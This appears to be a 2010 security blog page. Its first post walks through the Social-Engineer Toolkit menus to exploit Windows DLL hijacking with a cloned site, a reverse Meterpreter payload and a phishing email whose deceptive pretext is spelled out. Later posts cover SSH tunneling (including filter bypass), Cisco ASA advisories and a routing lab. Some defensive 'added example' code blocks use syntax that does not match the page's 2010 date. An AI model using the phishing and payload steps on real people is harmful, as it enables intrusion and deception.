Category: Networking and Security

Aug 25 2010

Microsoft DLL Hijacking with Social-Engineer Toolkit aka SET

I have to admit that I am a bit late to the party, but I see this as an opportunity to try out SET and learn a bit about the DLL hijacking issue at the same time.

Last Thursday, Acros, a Slovenian security firm, published an advisory that identified what they call a “binary planting” flaw in iTunes. Essentially, if you open a file type associated with iTunes from a remote network share, iTunes will also try to load one or more DLLs from the share. Even if the file the user opened is completely safe, a malicious DLL can be supplied that leads to code execution.

HD Moore stated that while working on the Windows Shortcut exploit, he stumbled on this class of bugs and identified a couple dozen applications that seemed to be affected by this problem. iTunes was one of these applications, and the details in the Acros advisory made it clear that this was indeed the same flaw. He was planning to finish the advisories and start contacting vendors on August 20th (last Friday). The Acros advisory on the 18th threw a wrench into this process.

Microsoft later released the following details in an advisory:

Microsoft is aware that research has been published detailing a remote attack vector for a class of vulnerabilities that affects how applications load external libraries.

This issue is caused by specific insecure programming practices that allow so-called “binary planting” or “DLL preloading attacks”. These practices could allow an attacker to remotely execute arbitrary code in the context of the user running the vulnerable application when the user opens a file from an untrusted location.

This issue is caused by applications passing an insufficiently qualified path when loading an external library. Microsoft has issued guidance to developers in the MSDN article, Dynamic-Link Library Security, on how to correctly use the available application programming interfaces to prevent this class of vulnerability. Microsoft is also actively reaching out to third-party vendors through the Microsoft Vulnerability Research Program to inform them of the mitigations available in the operating system. Microsoft is also actively investigating which of its own applications may be affected.

In addition to this guidance, Microsoft is releasing a tool that allows system administrators to mitigate the risk of this new attack vector by altering the library loading behavior system-wide or for specific applications. This advisory describes the functionality of this tool and other actions that customers can take to help protect their systems.

Mitigating Factors:

  • This issue only affects applications that do not load external libraries securely. Microsoft has previously published guidelines for developers in the MSDN article, Dynamic-Link Library Security, that recommend alternate methods to load libraries that are safe against these attacks.
  • For an attack to be successful, a user must visit an untrusted remote file system location or WebDAV share and open a document from this location that is then loaded by a vulnerable application.
  • The file sharing protocol SMB is often disabled on the perimeter firewall. This limits the possible attack vectors for this vulnerability.
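To make the search-order mechanics behind the advisory concrete, here is an added example (my own, not code from Microsoft, Acros or SET): a small Python model of the Windows DLL search order that shows which directory a DLL requested by bare name is taken from when a document is opened from a network share, and what changes when the application calls SetDllDirectory("") or the CWDIllegalInDllSearch policy from advisory 2269637 is applied. All directories and file names in it are constructed.

```python
"""Model of the Windows DLL search order behind the 'binary planting' bug class.

Search order with SafeDllSearchMode on (the default since XP SP2):
  1. the application's own directory
  2. the system directory (System32)
  3. the Windows directory
  4. the current working directory (CWD)
  5. the directories listed in PATH
The 16-bit system directory is left out for brevity. A DLL that is present in
steps 1-3 is never taken from the CWD; a planted copy only wins for a DLL the
application asks for that none of those directories contain.
"""
from typing import Dict, List, Optional, Set

# Constructed filesystem (directory -> file names); nothing here touches a real disk.
APP_DIR = r"C:\Program Files\Player"
SYSTEM32 = r"C:\Windows\System32"
WINDIR = r"C:\Windows"
PATH_DIRS = [r"C:\Tools"]
SHARE = r"\\fileserver\docs"  # untrusted share the user opened a document from

FS: Dict[str, Set[str]] = {
    APP_DIR: {"player.exe", "core.dll"},
    SYSTEM32: {"version.dll", "kernel32.dll"},
    WINDIR: set(),
    r"C:\Tools": set(),
    # The share holds the harmless document plus two planted DLLs.
    SHARE: {"song.mp3", "version.dll", "optional-codec.dll"},
}

# CWDIllegalInDllSearch policy values (the "tool" from Microsoft advisory 2269637).
# Value 1 (skip CWD only when it is a WebDAV folder) needs a Win32 query to tell
# WebDAV from SMB apart and is not modelled here.
CWD_ALLOWED = 0x00000000           # default: CWD stays in the search order
CWD_BLOCKED_IF_REMOTE = 0x00000002  # CWD skipped when it is a remote folder
CWD_NEVER = 0xFFFFFFFF              # CWD never searched


def is_remote(directory: str) -> bool:
    """UNC paths are remote. A mapped drive letter would need GetDriveType()
    to classify and is treated as local here."""
    return directory.startswith("\\\\")


def search_order(cwd: str, policy: int = CWD_ALLOWED,
                 app_removed_cwd: bool = False) -> List[str]:
    """Directories consulted, in order, for a DLL requested by bare name.
    app_removed_cwd models the application having called SetDllDirectory("")."""
    order = [APP_DIR, SYSTEM32, WINDIR]
    skip_cwd = (app_removed_cwd
                or policy == CWD_NEVER
                or (policy == CWD_BLOCKED_IF_REMOTE and is_remote(cwd)))
    if not skip_cwd:
        order.append(cwd)
    return order + PATH_DIRS


def resolve_dll(name: str, cwd: str, policy: int = CWD_ALLOWED,
                app_removed_cwd: bool = False) -> Optional[str]:
    """Directory the loader would take `name` from, or None if the load fails.
    A fully qualified name is looked up directly: no search, nothing to plant."""
    if "\\" in name:
        directory, base = name.rsplit("\\", 1)
        return directory if base in FS.get(directory, set()) else None
    for directory in search_order(cwd, policy, app_removed_cwd):
        if name in FS.get(directory, set()):
            return directory
    return None


def hijackable(name: str, cwd: str) -> bool:
    """True when, under the default policy, a bare-name request would be
    satisfied from a remote CWD, i.e. the planted copy is what gets loaded."""
    source = resolve_dll(name, cwd)
    return source is not None and is_remote(source)


if __name__ == "__main__":
    for dll in ("core.dll", "version.dll", "optional-codec.dll"):
        print(f"{dll:20} default            -> {resolve_dll(dll, SHARE)}")
        print(f"{'':20} policy 2           -> {resolve_dll(dll, SHARE, CWD_BLOCKED_IF_REMOTE)}")
        print(f"{'':20} SetDllDirectory('') -> {resolve_dll(dll, SHARE, app_removed_cwd=True)}")
```

Note that with either mitigation the optional DLL is simply not found, so the application has to handle a failed LoadLibrary gracefully rather than assume the load succeeded.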

Demo time with SET… Thanks to Dave for the wonderful video he posted this afternoon; I can now use it as the base for this demo.

What is SET?

The Social-Engineer Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates many useful social-engineering attacks in one simple interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. Among pentesters, social engineering is a practice that not many people perform. You can download the Social-Engineer Toolkit through Subversion by simply typing this in Back|Track 4 or any other Linux OS:

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

However, BT4 now ships with SET under /pentest/exploits/set; from there you can simply launch it with ./set and get the latest updates by selecting option 8.

SET can do tons of cool stuff; I have included a few links at the end of this post that explain them in detail, and I have a few posts to come that will go into more detail as well. However, for today's demo I will only be using a few of those features.

Launch and update SET

If you are using BackTrack 4, you can find SET under /pentest/exploits/set; launch it with ./set and, as stated above, select option 8 to get the latest and greatest updates.

Choose your path to pwnage

I selected option 2, “Web Attack Vectors”, which is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Select option 2 once more, “The Metasploit Browser Exploit Method”; this method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

And yet again select option 2, “Site Cloner”; this method will completely clone a website of your choosing and allow you to utilize the attack vectors within the same web application you were attempting to clone.

Choosing your browser Exploit:

At this point you have several options to choose from; today we will be picking option 1, “Microsoft Windows WebDAV Application DLL Hijacker”.

Choosing your Payload:

Once more you are given several options; I chose option 2, “Windows Reverse_TCP Meterpreter”, a payload that will spawn a Meterpreter shell on the victim and send it back to the attacker.

Once you are done, you have to choose your vulnerable extension types; if you are not certain, press Enter to choose the defaults, or find a semi-complete list over at exploit-db. At this point the malicious iframes are injected into the cloned website and await your victim.

SET Mass E-Mailer Option :

There are two options on the mass e-mailer; we are choosing option 1, which allows you to send an email to one individual person. Once you are done, you have to choose who you would like to send the phishing email to and who the sender is, and lastly whether you would like to use Gmail, your own mail server or some open relay server.

Next, think of something clever for the email subject and body. A good example would be to clone a local web-based system from your attacker network and send an email saying “we are doing some updates, kindly click to verify you can access this test link”. After you are finished, press Ctrl + C and hit Enter to complete this step. You will then receive a message stating that SET has sent the email. Now it is just a matter of waiting for your victim to click the link in the email and open the vulnerable files via the network share.

Exploit in action..

Once your victim clicks on the link, they will be presented with the cloned site at first, while the exploit begins doing its thing in the background. Shortly after, the user is presented with a network share containing the vulnerable files. After opening up the file, it's Game Over.

Since the initial reporting of this issue, many researchers have come out with several ways of doing this; so far some of my favorites are:

I have tested several of these and noticed that MSE AV was effective in identifying the msfpayload file; however, using the standard method I successfully exploited both Windows XP and Windows 7.

Reference links:

http://www.exploit-db.com/exploits/14726/

http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

http://blog.rapid7.com/?p=5325

http://www.securityfocus.com/archive/1/513190

http://www.microsoft.com/technet/security/advisory/2269637.mspx

http://www.vimeo.com/14403642

http://www.secmaniac.com/

http://www.offensive-security.com/offsec/microsoft-dll-hijacking-exploit-in-action/

http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit

Aug 24 2010

Linux Basix Eps017 Tech Segment

I appeared on the Linux Basix podcast a few weeks ago but since I was out of the country for a while I am now getting around to posting the show notes for my segment.

Information Security news in the world of Linux:

A security issue affects the following Ubuntu releases:
– Ubuntu 9.04
– Ubuntu 9.10
– Ubuntu 10.04 LTS

  • Brief Details:

It was discovered that the PC/SC service did not correctly handle malformed messages. A local attacker could exploit this to execute arbitrary code with root privileges. In short, update your system NOW!

Dell Latitude 2110 vulnerability –> https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-August/001135.html

A security issue affects the following Ubuntu releases:

  • Ubuntu 9.10
  • Ubuntu 10.04 LTS
  • Brief Details:

It was discovered that the Ubuntu image shipped on some Dell Latitude 2110 systems was accidentally configured to allow unauthenticated package installations. A remote attacker intercepting network communications or a malicious archive mirror server could exploit this to trick the user into installing unsigned packages, resulting in arbitrary code execution with root privileges.

Segment Title: SSH tunneling for good or evil!

What is SSH?

Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices.

How to install/Setup SSH?

First, be sure to install the most recent version; as of yesterday, OpenSSH 5.6 is the most recent version.

sudo apt-get install ssh (or build from source)

  • Then do a quick test by trying to SSH into your own machine: ssh localhost
  • Then of course you can always edit the /etc/ssh/sshd_config file and do things like force protocol version 2, deny root login and so on.

What is tunneling?

Tunneling, also known as “port forwarding,” is the transmission of data intended for use only within a private, usually corporate, network through a public network in such a way that the routing nodes in the public network are unaware that the transmission is part of a private network.

Various types of tunneling protocols:

  • HTTP
  • ICMP
  • DNS
  • SSH

    SSH tunneling, how it works: a nice YouTube video to get you started –> http://www.youtube.com/watch?v=EUplDL4hSuc

    When can you use this?

    • For good –> You can use this to create a SOCKS5 proxy to securely tunnel your web traffic, for instance if you are at a free Wi-Fi hot spot.
    • Or if you want to bypass some content filtering that’s in place to block you from accessing certain websites.
    • Securely tunnel your IM chat or email, which as you know are by default both clear-text protocols.

    Examples:

    Tunneling Gtalk traffic –> ssh -f -N user@myhomeserver.com -L 3000:talk.google.com:5222

    Tunneling Email –> ssh -f -N user@myhomeserver.com -L 2000:personal-server.com:25

    • For evil –> http://infolookup.securegossip.com/2010/05/13/keeping-an-eye-on-your-vendors/, “reverse SSH tunneling”: as you would expect, if tunneling is getting past a firewall in a forward direction, reverse tunneling is getting access to the inside host by going out and coming back in. I linked to a posting I did back in May about an incident I had to track down and remediate.
      • In short, a vendor of ours had a Linux-based appliance on the inside of our network which had a pre-configured “stealthy reverse tunnel” that would give them access to that system at any time without our assistance.
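The sshd_config edits mentioned above are where the server-side control over tunneling lives, and two OpenSSH parsing rules routinely defeat hand-hardening: the first value of a keyword wins, and anything after a Match line applies only to that block. As an added example (mine, not from the podcast notes), this Python audit checks the forwarding-related directives against a constructed sshd_config, applying both rules; the keywords, their OpenSSH defaults and the sample files are the only assumptions.

```python
"""Audit an sshd_config for the directives that control SSH tunnelling.

Two OpenSSH parsing rules matter when hardening by hand:
  * for each keyword the FIRST value in the file wins, so a hardening line
    appended at the bottom is silently ignored if the keyword was set earlier;
  * every directive after a `Match` line applies only to connections that
    satisfy that Match, so forwarding can be re-enabled per user or address.
Only whole-line comments (a leading #) are comments to sshd.
"""
import re
from typing import Dict, List, Tuple

# keyword -> (value wanted on a hardened server, OpenSSH default when unset)
EXPECTED = {
    "permitrootlogin":    ("no", "yes"),  # default was 'yes' before OpenSSH 7.0
    "allowtcpforwarding": ("no", "yes"),  # -L/-R/-D forwarding through this server
    "gatewayports":       ("no", "no"),   # remote forwards bound to non-loopback
    "permittunnel":       ("no", "no"),   # tun(4) device forwarding
}

# Constructed sshd_config for this example, not a real host's.
SAMPLE = """\
# constructed sample
Port 22
Protocol 2
PermitRootLogin yes
GatewayPorts no
X11Forwarding no
# "hardening" added later: ignored, because the PermitRootLogin above wins
PermitRootLogin no
Match User vendor
    AllowTcpForwarding yes
    PermitOpen 10.0.0.5:443
"""

HARDENED = """\
Protocol 2
PermitRootLogin no
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
"""


def parse_sshd_config(text: str) -> Tuple[Dict[str, str], Dict[str, Dict[str, str]]]:
    """Return (global directives, {match criteria: directives}).
    Keywords are lower-cased (sshd treats them case-insensitively) and the
    first-value-wins rule is applied inside each scope."""
    global_cfg: Dict[str, str] = {}
    match_cfgs: Dict[str, Dict[str, str]] = {}
    scope = global_cfg
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)  # 'Key value' or 'Key=value'
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            scope = match_cfgs.setdefault(value, {})
            continue
        scope.setdefault(key, value)  # first occurrence wins
    return global_cfg, match_cfgs


def audit(text: str) -> List[str]:
    """Human-readable findings; an empty list means every check passed."""
    cfg, matches = parse_sshd_config(text)
    findings: List[str] = []
    for key, (want, default) in EXPECTED.items():
        got = cfg.get(key)
        if got is None:
            if default != want:
                findings.append(f"{key} not set; OpenSSH default '{default}' applies")
        elif got.lower() != want:
            findings.append(f"{key} is '{got}' (first value wins); want '{want}'")
    if "1" in cfg.get("protocol", "2").split(","):
        findings.append("protocol allows SSH-1")
    for criteria, block in matches.items():
        for key, (want, _) in EXPECTED.items():
            if key in block and block[key].lower() != want:
                findings.append(f"Match {criteria}: {key} '{block[key]}' re-enabled for matching connections")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("-", finding)
    print("hardened sample:", audit(HARDENED) or "no findings")
```

A Match block that re-enables forwarding is not necessarily wrong (the PermitOpen line limits where that user may forward to), but it is exactly the kind of exception to review when a vendor account is involved.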

    Reference Links

    https://secure.wikimedia.org/wikipedia/en/wiki/Secure_Shell

    https://calomel.org/firefox_ssh_proxy.html

    https://help.ubuntu.com/community/SSH/OpenSSH/Configuring
    http://www.howtogeek.com/howto/ubuntu/setup-openssh-server-on-ubuntu-linux/

    http://searchenterprisewan.techtarget.com/sDefinition/0,,sid200_gci213230,00.html

    Aug 04 2010

    Multiple Vulnerabilities in Cisco ASA 5500 Series “Public Release 2010 August 04”

    I received notification of the vulnerabilities outlined below via the full-disclosure mailing list, but you can find a direct link to the advisory here –> Link. I figured it was worth mentioning again since most organizations depend on their firewall as the primary means of protection against the many threats on the internet.

    The Cisco ASA 5500 Series Adaptive Security Appliance is a modular platform that provides security and VPN services. It offers firewall, intrusion prevention system (IPS), anti-X, and VPN services.

    Cisco ASA 5500 Series Adaptive Security Appliances are affected by the following vulnerabilities:

    SunRPC Inspection Denial of Service Vulnerabilities

    The Sun RPC inspection engine enables or disables application inspection for the Sun RPC protocol. Sun RPC is used by Network File System (NFS) and Network Information Service (NIS). Sun RPC services can run on any port. When a client attempts to access a Sun RPC service on a server, it must learn the port that service is running on. The client does this by querying the port mapper process, usually rpcbind, on the well-known port of 111. Three DoS vulnerabilities affect the SunRPC inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances, in which an unauthenticated attacker may cause the affected device to reload.

    Note: Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities. These vulnerabilities can be triggered by using UDP packets, not TCP.

    These vulnerabilities are documented in Cisco bug IDs CSCtc77567, CSCtc79922, and CSCtc85753; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1578, CVE-2010-1579, and CVE-2010-1580, respectively.

    Transport Layer Security (TLS) Denial of Service Vulnerabilities

    TLS and its predecessor, SSL, are cryptographic protocols that provide security for communications over IP data networks such as the Internet.

    Three vulnerabilities exist on the Cisco ASA security appliances that can be triggered by a series of crafted TLS packets. An unauthenticated attacker may cause the affected device to reload. A Cisco ASA device configured for SSL VPN, TLS Proxy for Encrypted Voice Inspection, or configured to accept ASDM management connections is vulnerable.

    These vulnerabilities are documented in Cisco bug IDs CSCtd32627, CSCtf37506, and CSCtf55259; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1581, CVE-2010-2814, and CVE-2010-2815, respectively.

    Session Initiation Protocol (SIP) Inspection Denial of Service Vulnerability

    SIP, as defined by the Internet Engineering Task Force (IETF), enables call handling sessions, particularly two-party audio conferences, or “calls.” SIP works with SDP for call signalling. SDP specifies the ports for the media stream. Using SIP, the Cisco ASA can support any SIP VoIP gateways and VoIP proxy servers. To support SIP calls through the Cisco ASA, signaling messages for the media connection addresses, media ports, and embryonic connections for the media must be inspected, because while the signaling is sent over a well-known destination port (UDP/TCP 5060), the media streams are dynamically allocated. Also, SIP embeds IP addresses in the user-data portion of the IP packet. SIP inspection applies NAT for these embedded IP addresses.

    A DoS vulnerability affects the SIP inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances. SIP inspection is enabled by default. During successful exploitation, an unauthenticated attacker may cause the affected device to reload.

    Note: Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities.

    This vulnerability is documented in Cisco bug ID CSCtd32106 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2816.

    Crafted Internet Key Exchange (IKE) Message Denial of Service Vulnerability

    IPsec is an IP security feature that provides robust authentication and encryption of IP packets. IKE is a key management protocol standard that is used in conjunction with the IPsec standard. A DoS vulnerability exists in the IKE implementation of the Cisco ASA.

    During successful exploitation, an unauthenticated attacker may cause an affected device to reload.

    Note: Only traffic that is destined to the appliance may trigger this vulnerability when the affected device is configured for IPsec remote access or site-to-site VPNs.

    This vulnerability is documented in Cisco bug ID CSCte46507 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2817.

    As a side note, I would like to add that unless you are already running version 8.3 you should disable the vulnerable services and take a moment to read the release notes for version 8.3.
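What “disable the vulnerable services” looks like on the box, as an added example of mine rather than text from the advisory: the SunRPC and SIP inspection engines are taken out of the default global service policy. This assumes the default policy-map and class names (global_policy and inspection_default); check yours with show running-config policy-map first.

```text
! Added example: remove the two inspection engines with open DoS bugs
policy-map global_policy
 class inspection_default
  no inspect sunrpc
  no inspect sip
!
! Confirm they no longer appear in the active policy
show service-policy
```

Weigh this against what the advisory text above says each engine does: without SunRPC inspection the ASA no longer learns the dynamic ports NFS/NIS negotiate through rpcbind, and without SIP inspection it no longer rewrites the embedded addresses and media ports, so VoIP through the firewall needs another arrangement. The TLS and IKE issues are in services the appliance itself terminates, so there is nothing to switch off short of the upgrade.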

    There are some syntax changes you have to adjust to, as well as a full rule-set conversion. Below is an example of an old rule and its recommended migrated counterpart. Not all of the migrated rules are new, since they were supported in older versions; however, it is now mandatory to write them the proper/recommended way instead of the older way.

    Old Configuration

    static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

    access-list 1 extended permit tcp any host 172.23.57.170 eq 5080

    access-list 1 extended permit udp any host 172.23.57.170 eq 5080

    access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

    access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

    access-group 1 in interface outside

    Migrated Configuration

    static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

    access-list 1 extended permit tcp any host 10.50.50.50 eq 80

    access-list 1 extended permit udp any host 172.23.57.170 eq 5080

    access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

    access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

    access-group 1 in interface outside

    Jul 13 2010

    Cisco Administrative Distance Manipulation – Part 1

    Ok – “infolookup” has been asking for my contribution to his blog for quite some time now.  This is my first and hopefully not the last.

    Recently I needed to meet a redundancy requirement on a Cisco router running both EIGRP and OSPF. The requirement was simple: favor the prefix learned via EIGRP and use the prefix learned via OSPF as a backup. I must also mention that the prefix is an EIGRP (D EX) route, which has an AD of 170 and an OSPF (O E2) route which has an AD of 110. In the first part of this article, I will go through the setup of the lab, which closely simulates the scenario I had and in the second part, will go through the actual remedy implemented that resulted in a “happy network”.

    Let’s get to it.

    First, let’s go through the topology. This lab contains 5 routers, R0 – R4, as follows:

    R0 = Representing a 3rd party network , who is advertising 198.200.230.0/24; 222.102.23.0/24; 0.0.0.0/0; 172.203.46.0/24

    R1 = R0′s BGP peer / NAT point of our network / redistribution point of BGP to EIGRP

    R2 = The Main router running EIGRP, RIP & OSPF (Think of this as the CORE of a particular site)

    R3 = Router running RIP and OSPF. This provides a backup route towards one of the destinations available from R0 (222.102.23.0/24)

    R4 = Router running OSPF. This provides a backup route towards one of the destinations available from R0  (198.200.230.0/24)

    Please see Topology Diagram:

    Administrative Distance Lab Topology

    R0′s relevant configuration:

    hostname R0
    !
    interface Loopback0
    ip address 198.200.230.1 255.255.255.0
    !
    interface Loopback1
    ip address 222.102.23.1 255.255.255.0
    !
    interface Loopback2
    ip address 172.203.46.1 255.255.255.0
    !
    interface FastEthernet0/0
    description FastE to R1
    ip address 10.146.12.2 255.255.255.254
    duplex auto
    speed auto
    !
    router bgp 65000
    no synchronization
    bgp log-neighbor-changes
    network 0.0.0.0
    network 172.203.46.0 mask 255.255.255.0
    network 198.200.230.0
    network 222.102.23.0
    neighbor R1-eBGP peer-group
    neighbor R1-eBGP remote-as 65001
    neighbor R1-eBGP route-map ROUTER-1-IN in
    neighbor R1-eBGP route-map ROUTER-1-OUT out
    neighbor 10.146.12.3 peer-group R1-eBGP
    no auto-summary
    !
    ip route 0.0.0.0 0.0.0.0 Null0
    !
    ip prefix-list R1-IN seq 5 permit 172.32.27.0/24
    !
    ip prefix-list R1-OUT seq 5 permit 198.200.230.0/24
    ip prefix-list R1-OUT seq 10 permit 222.102.23.0/24
    ip prefix-list R1-OUT seq 15 permit 172.203.46.0/24
    ip prefix-list R1-OUT seq 20 permit 0.0.0.0/0
    !
    route-map ROUTER-1-IN permit 10
    match ip address prefix-list R1-IN
    !
    route-map ROUTER-1-OUT permit 10
    match ip address prefix-list R1-OUT
    !
    Nothing fancy here, just basic BGP peering and prefix advertisement filters (in/outbound).

    R1′s relevant configuration:
    hostname R1
    !
    ip address 172.32.27.1 255.255.255.0
    !
    interface Loopback1
    ip address 172.25.240.1 255.255.255.0
    !
    interface FastEthernet0/0
    description FastE to R0

    ip address 10.146.12.4 255.255.255.254
    ip nat inside
    ip virtual-reassembly

    duplex auto
    speed auto
    !
    interface FastEthernet1/0
    description FastE to R2

    ip address 10.146.12.3 255.255.255.254
    ip nat outside
    ip virtual-reassembly

    duplex auto
    speed auto
    !
    router eigrp 200
    redistribute bgp 65001 metric 1 1 1 1 1
    network 10.146.12.4 0.0.0.0
    network 172.25.240.1 0.0.0.0
    no auto-summary
    !
    router bgp 65001
    no synchronization
    bgp log-neighbor-changes
    network 172.32.27.0 mask 255.255.255.0
    neighbor R0-eBGP peer-group
    neighbor R0-eBGP remote-as 65000
    neighbor R0-eBGP route-map ROUTER-0-OUT out
    neighbor 10.146.12.2 peer-group R0-eBGP
    no auto-summary
    !
    ip nat pool OVERLOAD 172.32.27.100 172.32.27.100 netmask 255.255.255.0
    ip nat inside source list 10 pool OVERLOAD overload
    !
    ip prefix-list R0-OUT seq 5 permit 172.32.27.0/24
    !
    access-list 10 deny 10.146.12.3
    access-list 10 permit any
    !
    route-map ROUTER-0-OUT permit 10
    match ip address prefix-list R0-OUT
    !

    Not too fancy either. Doing BGP to EIGRP redistribution and performing NAT on traffic sourcing from ACL 10. Since R1 is only advertising 172.32.27.0/24 to R0, without the NATing on R1, I wouldn’t be able to ping R0′s loopbacks from R4 for example.

    R2′s relevant configuration:

    hostname R2
    !
    interface FastEthernet0/0
    ip address 10.146.12.5 255.255.255.254
    duplex auto
    speed auto
    !
    interface FastEthernet1/0
    ip address 172.19.200.1 255.255.255.0
    duplex auto
    speed auto
    !
    router eigrp 200
    redistribute ospf 100 metric 1 1 1 1 1
    network 10.146.12.5 0.0.0.0
    no auto-summary
    !
    router ospf 100
    router-id 172.19.200.1
    log-adjacency-changes
    network 172.19.200.1 0.0.0.0 area 0
    network 172.25.196.1 0.0.0.0 area 0
    default-information originate always
    !
    router rip
    version 2
    network 172.19.0.0
    no auto-summary
    !

    Probably the simplest of all the configs, but this is the key router on which we’ll be going through the Administrative Distance (AD) exercise.   Not a lot to explain here either.  Redistributing OSPF into EIGRP, so that R1 knows of the subnets from R3/4 as well as the shared segment between R2/R3 and R4.

    R3′s relevant configuration:


    hostname R3
    !
    !
    interface Loopback1
    ip address 11.12.13.1 255.255.252.0
    !
    interface Loopback2
    ip address 14.15.16.1 255.255.252.0
    !
    interface Loopback3
    ip address 201.200.200.2 255.255.255.0
    !
    interface Loopback4
    ip address 199.199.199.1 255.255.255.0
    !
    interface FastEthernet0/0
    ip address 172.19.200.2 255.255.255.0
    duplex auto
    speed auto
    !
    router ospf 100
    router-id 172.19.200.2
    log-adjacency-changes
    network 11.12.13.1 0.0.0.0 area 0
    network 14.15.16.1 0.0.0.0 area 0
    network 172.19.200.2 0.0.0.0 area 0
    distribute-list prefix DEFAULT-ONLY in
    !
    router rip
    version 2
    redistribute static
    network 172.19.0.0
    no auto-summary
    !
    ip route 222.102.23.0 255.255.255.0 Null0
    !
    !
    ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0
    !

    A few things to note here.  Although Lo1/2 and Fa0/0 are in OSPF, I am only allowing a default (0.0.0.0/0) to be installed into the routing table from the OSPF process.  Also note the static route to Null0;  This is a lab after all, instead of having a dummy host on the other side of an interface, I created the static to Null0 so I can have a “live” static route to play with (ie. “redistribute static” under rip)

    R4′s relevant configuration:

    hostname R4
    !
    interface Loopback1
    ip address 199.20.46.1 255.255.254.0
    !
    interface Loopback2
    ip address 198.22.12.1 255.255.254.0
    !
    interface FastEthernet0/0
    ip address 172.19.200.3 255.255.255.0
    duplex auto
    speed auto
    !
    router ospf 100
    router-id 172.19.200.3
    log-adjacency-changes
    redistribute static subnets
    network 172.19.200.3 0.0.0.0 area 0
    distribute-list prefix DEFAULT-ONLY in
    !
    ip route 198.200.230.0 255.255.255.0 Null0
    !
    !
    ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0

    A few things to note here. Much like R3, Lo1/2 and Fa0/0 are in OSPF, I am only allowing a default (0.0.0.0/0) to be installed into the routing table from the OSPF process. Also note the static route to Null0;

    Ok – Enough configuration.  Let’s look at some show commands to verify that the network is up and running as we want, and also point out the behavior that needs correcting – to be done in Part 2.


    +++++++ R0
    R0#sh ip bgp summary | b Neigh
    Neighbor V AS MsgRcvd MsgSent TblVer InQ OutQ Up/Down State/PfxRcd
    10.146.12.3 4 65001 1677 1677 14 0 0 1d03h 1
    R0#sh ip bgp neighbors 10.146.12.3 advertised-routes | b Net
    Network Next Hop Metric LocPrf Weight Path
    *> 0.0.0.0 0.0.0.0 0 32768 i
    *> 172.203.46.0/24 0.0.0.0 0 32768 i
    *> 198.200.230.0 0.0.0.0 0 32768 i
    *> 222.102.23.0 0.0.0.0 0 32768 i
    Total number of prefixes 4
    R0#sh ip bgp | b Net
    Network Next Hop Metric LocPrf Weight Path
    *> 0.0.0.0 0.0.0.0 0 32768 i
    *> 172.32.27.0/24 10.146.12.3 0 0 65001 i
    *> 172.203.46.0/24 0.0.0.0 0 32768 i
    *> 198.200.230.0 0.0.0.0 0 32768 i
    *> 222.102.23.0 0.0.0.0 0 32768 i
    R0#

    +++++++ R1
    R1#
    R1#sh ip nat statistics
    Total active translations: 0 (0 static, 0 dynamic; 0 extended)
    Outside interfaces:
    FastEthernet1/0
    Inside interfaces:
    FastEthernet0/0
    Hits: 409 Misses: 8
    CEF Translated packets: 181, CEF Punted packets: 16
    Expired translations: 47
    Dynamic mappings:
    -- Inside Source
    [Id: 1] access-list 10 pool OVERLOAD refcount 0
    pool OVERLOAD: netmask 255.255.255.0
    start 172.32.27.100 end 172.32.27.100
    type generic, total addresses 1, allocated 0 (0%), misses 102
    Appl doors: 0
    Normal doors: 0
    Queued Packets: 0
    R1#

    +++++++ R2

    R2#sh ip route eigrp
    172.203.0.0/24 is subnetted, 1 subnets
    D EX 172.203.46.0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
    172.25.0.0/24 is subnetted, 1 subnets
    D 172.25.240.0 [90/156160] via 10.146.12.4, 1d05h, FastEthernet0/0
    172.32.0.0/24 is subnetted, 1 subnets
    D EX 172.32.27.0 [170/2560002816] via 10.146.12.4, 1d02h, FastEthernet0/0
    D*EX 0.0.0.0/0 [170/2560002816] via 10.146.12.4, 1d03h, FastEthernet0/0
    R2#sh ip route ospf
    O E2 198.200.230.0/24 [110/20] via 172.19.200.3, 1d02h, FastEthernet1/0
    11.0.0.0/32 is subnetted, 1 subnets
    O 11.12.13.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
    14.0.0.0/32 is subnetted, 1 subnets
    O 14.15.16.1 [110/2] via 172.19.200.2, 1d02h, FastEthernet1/0
    R2#sh ip route rip
    R 222.102.23.0/24 [120/1] via 172.19.200.2, 00:00:16, FastEthernet1/0
    R2#

    +++++++ R3

    R3#sh ip route ospf
    O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
    R3#sh ip rip database
    172.19.0.0/16 auto-summary
    172.19.200.0/24 directly connected, FastEthernet0/0
    222.102.23.0/24 auto-summary
    222.102.23.0/24 redistributed
    [1] via 0.0.0.0,
    R3#

    +++++++ R4

    R4#sh ip route ospf
    O*E2 0.0.0.0/0 [110/1] via 172.19.200.1, 1d02h, FastEthernet0/0
    R4#

